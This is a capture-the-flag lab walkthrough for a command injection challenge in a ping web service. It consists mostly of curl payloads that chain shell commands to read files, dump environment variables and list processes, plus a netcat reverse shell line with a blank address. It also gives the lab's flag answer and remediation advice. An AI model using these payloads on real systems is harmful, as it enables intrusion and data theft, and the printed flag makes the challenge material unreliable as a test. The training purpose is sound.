Lab Icon

Ping Pwn

Challenge 03 Dec 2025 Free Access Solution Available

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

1
Flags
5
Points
64%
Success Rate
Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Challenge

Ping Pwn - Complete Solution Walkthrough

Step 1: Initial Service Discovery

  1. Challenge Presentation: Access the challenge at <target-ip>:80 to read the challenge description and understand the objectives.
  2. Service Discovery: The challenge indicates a network monitoring service is running. Scan for open ports:
nmap -p 1-10000 <target-ip>
  1. Identify Services: You should find:
    • Port 80: Web server hosting the challenge description
    • Port 8080: The target network monitoring service
  2. Service Enumeration: Access the monitoring service:
curl http://<target-ip>:8080/

Step 2: Service Analysis and Exploration

  1. Web Interface Analysis: The service presents a "Network Monitoring Tool" with a form interface for testing network connectivity.
  2. Functionality Testing: The service provides a ping functionality through HTTP GET parameters. Test basic functionality:
curl "http://<target-ip>:8080/ping?host=google.com"
  1. Response Analysis: The service returns the output of a ping command, suggesting it executes system commands based on user input.
  2. Parameter Identification: The service accepts a host parameter that appears to be passed directly to a ping command.
  3. Additional Endpoint Discovery: Check for other endpoints:
curl http://<target-ip>:8080/health

Step 3: Vulnerability Identification - Command Injection Testing

  1. Hypothesis: If the service passes user input directly to system commands without proper sanitization, it may be vulnerable to command injection.
  2. Basic Injection Test: Test command chaining using semicolon separator:
curl "http://<target-ip>:8080/ping?host=google.com;whoami"
  1. Expected Result: If vulnerable, you should see both ping output and the result of the whoami command.
  2. Alternative Injection Methods: If semicolons are filtered, test other command separators:
# Using logical AND operator
curl "http://<target-ip>:8080/ping?host=google.com&&id"

# Using logical OR operator  
curl "http://<target-ip>:8080/ping?host=invalidhost||whoami"

# Using backticks for command substitution
curl "http://<target-ip>:8080/ping?host=\`whoami\`"

# Using $() for command substitution
curl "http://<target-ip>:8080/ping?host=\$(id)"

Step 4: System Reconnaissance and Flag Discovery

  1. System Information Gathering: Once command injection is confirmed, gather system information:
# Check current user and groups
curl "http://<target-ip>:8080/ping?host=google.com;id"

# List current directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la"

# Check root directory contents
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /"

# Check working directory
curl "http://<target-ip>:8080/ping?host=google.com;pwd"
  1. Flag File Discovery: Search for flag files in common locations:
# Search for files containing 'flag'
curl "http://<target-ip>:8080/ping?host=google.com;find / -name '*flag*' 2>/dev/null"

# Check for flag.txt in root directory
curl "http://<target-ip>:8080/ping?host=google.com;ls -la /flag.txt"

# Search in common CTF flag locations
curl "http://<target-ip>:8080/ping?host=google.com;find /home /root /tmp -name 'flag*' 2>/dev/null"

Step 5: Flag Extraction

  1. Read the Flag File: Once you locate the flag at /flag.txt, extract its contents:
curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt"
  1. Alternative Reading Methods: If cat doesn't work, try alternative approaches:
# Using head command
curl "http://<target-ip>:8080/ping?host=google.com;head /flag.txt"

# Using tail command
curl "http://<target-ip>:8080/ping?host=google.com;tail /flag.txt"

# Using more command
curl "http://<target-ip>:8080/ping?host=google.com;more /flag.txt"

# Using xxd for hex dump
curl "http://<target-ip>:8080/ping?host=google.com;xxd /flag.txt"
  1. Flag Verification: The flag should be in UUID format:
2d14fec8-29c6-4f8d-9fbc-5ce16aceb252

Step 6: Advanced Exploitation Techniques

  1. URL Encoding: If special characters are filtered, use URL encoding:
# URL encoded semicolon (%3B) and space (%20)
curl "http://<target-ip>:8080/ping?host=google.com%3Bcat%20/flag.txt"

# URL encoded ampersand (%26)
curl "http://<target-ip>:8080/ping?host=google.com%26%26cat%20/flag.txt"
  1. Environment Variable Exploitation: Explore environment variables for additional information:
# Display all environment variables
curl "http://<target-ip>:8080/ping?host=google.com;env"

# Check specific variables
curl "http://<target-ip>:8080/ping?host=google.com;echo \$HOME"
curl "http://<target-ip>:8080/ping?host=google.com;echo \$PATH"
  1. Process and Network Information: Gather additional system intelligence:
# List running processes
curl "http://<target-ip>:8080/ping?host=google.com;ps aux"

# Check network connections
curl "http://<target-ip>:8080/ping?host=google.com;netstat -an"

# Check system information
curl "http://<target-ip>:8080/ping?host=google.com;uname -a"

Step 7: Understanding the Vulnerability

  1. Root Cause Analysis: The vulnerability exists because the application uses Python's os.popen() function with user-controlled input without proper sanitization.
  2. Vulnerable Code Pattern: The problematic code likely looks like:
# Vulnerable implementation
command = f"ping -c 1 {host}"
result = os.popen(command).read()
  1. Attack Vector: By including command separators in the host parameter, attackers can append additional commands that get executed by the shell.
  2. Impact Assessment: This vulnerability allows for complete system compromise with the privileges of the web application user.

Step 8: Alternative Exploitation Methods

  1. Python-based Payload: Use Python for more complex operations:
# Python one-liner to read flag
curl "http://<target-ip>:8080/ping?host=google.com;python3 -c 'print(open("/flag.txt").read().strip())'"
  1. Base64 Encoding: If output filtering is implemented, use base64 encoding:
# Base64 encode the flag
curl "http://<target-ip>:8080/ping?host=google.com;cat /flag.txt | base64"

# Decode locally
echo "" | base64 -d
  1. Reverse Shell (Advanced): For persistent access (if needed for other objectives):
# Simple reverse shell (replace with your IP and port)
curl "http://<target-ip>:8080/ping?host=google.com;nc   -e /bin/sh"

Security Implications and Remediation

  1. Vulnerability Classification: This is a critical command injection vulnerability (CWE-78) that allows remote code execution.
  2. Proper Remediation:
    • Use parameterized commands instead of string concatenation
    • Implement strict input validation with allowlists
    • Use subprocess with shell=False in Python
    • Apply principle of least privilege
    • Implement proper error handling and logging
  3. Secure Implementation Example:
# Secure implementation
import subprocess
import re

# Validate input - only allow valid hostnames/IPs
if re.match(r'^[a-zA-Z0-9.-]+$', host):
    result = subprocess.run(['ping', '-c', '1', host], 
                          capture_output=True, text=True, timeout=10)
    return result.stdout
else:
    return "Invalid host format"

Tools and Techniques Summary

  • Service Discovery: nmap, curl, manual exploration
  • Vulnerability Testing: Command injection payloads, multiple separator types
  • Data Extraction: System commands (cat, find, ls), file operations
  • Encoding/Bypasses: URL encoding, base64 encoding, alternative commands
  • Post-Exploitation: System reconnaissance, environment analysis